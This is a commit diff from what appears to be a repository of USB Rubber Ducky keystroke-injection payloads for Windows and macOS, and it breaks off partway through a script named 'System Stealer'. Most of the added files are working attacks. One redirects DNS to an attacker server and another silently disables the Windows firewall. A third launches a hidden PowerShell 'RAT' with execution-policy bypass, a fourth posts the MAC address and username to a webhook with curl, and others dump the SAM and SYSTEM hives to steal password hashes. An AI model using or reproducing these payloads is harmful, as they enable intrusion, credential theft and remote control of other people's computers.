Compare commits
61 Commits
e687deb799
...
f375621da1
Author | SHA1 | Date |
---|---|---|
cribb-it | f375621da1 | |
Peaks | f3053273a4 | |
Peaks | d5e02033fe | |
bst04 | b2b8cf8b2e | |
Peaks | 3333420b26 | |
bst04 | 8cd44e511c | |
bst04 | bad6fb6040 | |
bst04 | 9c3f29df37 | |
Luu | 3604620ab9 | |
Luu | 261e82a829 | |
Peaks | 5f13d6090f | |
Luu | 1a1c79d5ba | |
Luu | 203d986ae4 | |
Peaks | 6ae414c545 | |
Luu | aeffdbfcbd | |
Luu | 9a5857b2af | |
Luu | aa5afab7ed | |
Luu | f6fb02fe34 | |
Luu | 0bb2f83a10 | |
Luu | 4a6e17773d | |
Luu | 81ae8f0e8c | |
Luu | 554b3066b7 | |
Peaks | 7f56669213 | |
Peaks | 645f1e9fe3 | |
bst04 | 59d4883817 | |
Aleff | 1ea9c8a689 | |
Aleff | 47fa68ecd9 | |
bst04 | b9de56e67d | |
bst04 | 0403e79d70 | |
Peaks | a8c264c752 | |
UberGuidoZ | a18f4561e2 | |
UberGuidoZ | ad644d8849 | |
UberGuidoZ | 8c3110d8f1 | |
UberGuidoZ | a94beb0c75 | |
UberGuidoZ | 467075df68 | |
UberGuidoZ | e3c28b36ee | |
Peaks | 44af31e74b | |
Mavis Coffey | cacb21ad7e | |
Mavis Coffey | 61eb88ab6c | |
Mavis Coffey | 8be0f9a092 | |
Mavis Coffey | 63e0c18618 | |
Mavis Coffey | 81807425f5 | |
Mavis Coffey | 083951025f | |
Mavis Coffey | 1a5aa0bd08 | |
Mavis Coffey | a323fc3281 | |
UberGuidoZ | b2c8194099 | |
UberGuidoZ | 97745c360d | |
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Mavis Coffey | cf0c83d37c | |
Mavis Coffey | 8293bf5d4d | |
Mavis Coffey | 6ad0b7836c | |
mavisinator30001 | 8073d4d9cd | |
cribb-it | 59c5175b3e | |
cribb-it | 61b9a826cf |
|
@ -0,0 +1,27 @@
|
||||||
|
# Spoof DNS - Windows ✅
|
||||||
|
|
||||||
|
DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the primary and secondary dns servers
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,69 @@
|
||||||
|
REM Title: DNS changer
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Changes DNS address of windows machine in powershell
|
||||||
|
REM Target: Windows 10/11
|
||||||
|
|
||||||
|
REM wifi interface should be named: Wi-Fi
|
||||||
|
DEFINE #interface Ethernet
|
||||||
|
DEFINE #primaryDNS 192.168.1.3
|
||||||
|
DEFINE #secondaryDNS 1.1.1.1
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
GUI r
|
||||||
|
DELAY 150
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
|
||||||
|
REM below is to blink the LED when payload done
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -0,0 +1,24 @@
|
||||||
|
# Disable WiFi 🛜
|
||||||
|
|
||||||
|
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Disable WiFi
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Execution
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
`DEFINE #MODE off`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Run or stop the WiFi
|
|
@ -0,0 +1,53 @@
|
||||||
|
REM_BLOCK
|
||||||
|
##################################
|
||||||
|
# #
|
||||||
|
# Title : Disable WiFi #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Execution #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
##################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||||
|
DEFINE #MODE off
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
|
||||||
|
DELAY 250
|
||||||
|
GUI q
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Firewall Deactivator - Windows ✅
|
||||||
|
|
||||||
|
Deactivate firewall on windows
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to deactivate all firewalls on windows in a discrete manner.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,61 @@
|
||||||
|
REM Title: Firewall deactivator
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Deactivate all firewalls in windows machine using hidden powershell
|
||||||
|
REM Target: Windows
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 200
|
||||||
|
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,41 @@
|
||||||
|
REM TITLE R.A.T
|
||||||
|
REM AUTHOR TRIBBIC
|
||||||
|
REM DESCRIPTION Set up a R.A.T on the target windows machine
|
||||||
|
REM DUCKY SCRIPT 3
|
||||||
|
|
||||||
|
REM USERNAME to login to the R.A.T
|
||||||
|
DEFINE #USERNAME name
|
||||||
|
REM Your IP Address use https://www.ipchicken.com/ to get your IP
|
||||||
|
DEFINE #IPADDRESS 192.168.1.1
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 200
|
||||||
|
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')
|
|
@ -0,0 +1,22 @@
|
||||||
|
# RAT
|
||||||
|
- Author: TRIBBIC
|
||||||
|
- Version: 1.0
|
||||||
|
- Target: Windows 10 (Powershell 5.1+)
|
||||||
|
- Category: Execution
|
||||||
|
- Attackmode: HID & Storage
|
||||||
|
- Ducky Script Version: 3
|
||||||
|
|
||||||
|
## Setup
|
||||||
|
In the payload.txt change the two DEFINE's
|
||||||
|
|
||||||
|
\#USERNAME Should be your login name
|
||||||
|
|
||||||
|
\#IPADDRESS Should be your IP Address
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Create a R.A.T using Windows Powershell on Targets PC
|
||||||
|
|
||||||
|
## Change Log
|
||||||
|
| Version | Changes |
|
||||||
|
| ------- | --------------- |
|
||||||
|
| 1.0 | Initial release |
|
|
@ -0,0 +1,25 @@
|
||||||
|
# Exfiltrate Mac Address - MacOS
|
||||||
|
|
||||||
|
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Exfiltrate Mac Address
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Exfiltration
|
||||||
|
- **Target**: MacOS
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- Set the #WEBHOOK to complete the exfiltration
|
||||||
|
`DEFINE #WEBHOOK example`
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Terminal**.
|
||||||
|
- Acquire the mac address and the system user name
|
||||||
|
- Send this informations through the Webhook
|
|
@ -0,0 +1,55 @@
|
||||||
|
REM_BLOCK
|
||||||
|
####################################################
|
||||||
|
# #
|
||||||
|
# Title : Exfiltrate Mac Address - MacOS #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Exfiltration #
|
||||||
|
# Target : MacOS #
|
||||||
|
# #
|
||||||
|
####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Set the #WEBHOOK to complete the exfiltration
|
||||||
|
DEFINE #WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN TERMINAL
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN mac=$(networksetup -getmacaddress en0)
|
||||||
|
DELAY 750
|
||||||
|
STRINGLN name=$(id -un)
|
||||||
|
DELAY 850
|
||||||
|
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
|
|
@ -0,0 +1,12 @@
|
||||||
|
# IP-OUT
|
||||||
|
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Useful Tips
|
||||||
|
|
||||||
|
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||||
|
|
||||||
|
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -0,0 +1,63 @@
|
||||||
|
REM Title: IP-Out
|
||||||
|
REM Author: Mavisinator30001
|
||||||
|
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||||
|
REM Target: Any Windows System
|
||||||
|
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DELAY 500
|
||||||
|
GUI r
|
||||||
|
DELAY 300
|
||||||
|
STRINGLN Powershell
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ATTACKMODE OFF
|
||||||
|
HIDE_PAYLOAD
|
|
@ -0,0 +1,29 @@
|
||||||
|
# Exfiltrate NTLM Hash - Windows ✅
|
||||||
|
|
||||||
|
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
|
||||||
|
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
|
||||||
|
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align="center">
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>GitHub
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,81 @@
|
||||||
|
REM_BLOCK
|
||||||
|
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
|
||||||
|
AUTHOR Luu176
|
||||||
|
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
|
||||||
|
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
|
||||||
|
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
|
||||||
|
the defined storage drive on the Ducky device.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #driveLabel DUCKY
|
||||||
|
REM below you can set the number of blinks for the caps lock when finished (default 9)
|
||||||
|
DEFINE #numBlinks 9
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE)
|
||||||
|
CAPSLOCK
|
||||||
|
END_IF
|
||||||
|
GUI d
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 800
|
||||||
|
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
|
||||||
|
GUI d
|
||||||
|
WAIT_FOR_CAPS_ON
|
||||||
|
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < #numBlinks )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -0,0 +1,74 @@
|
||||||
|
REM TITLE System Stealer
|
||||||
|
REM AUTHOR mavisinator30001
|
||||||
|
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||||
|
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||||
|
REM DISCLAIMER This is for educational purposes ONLY
|
||||||
|
DELAY 1000
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
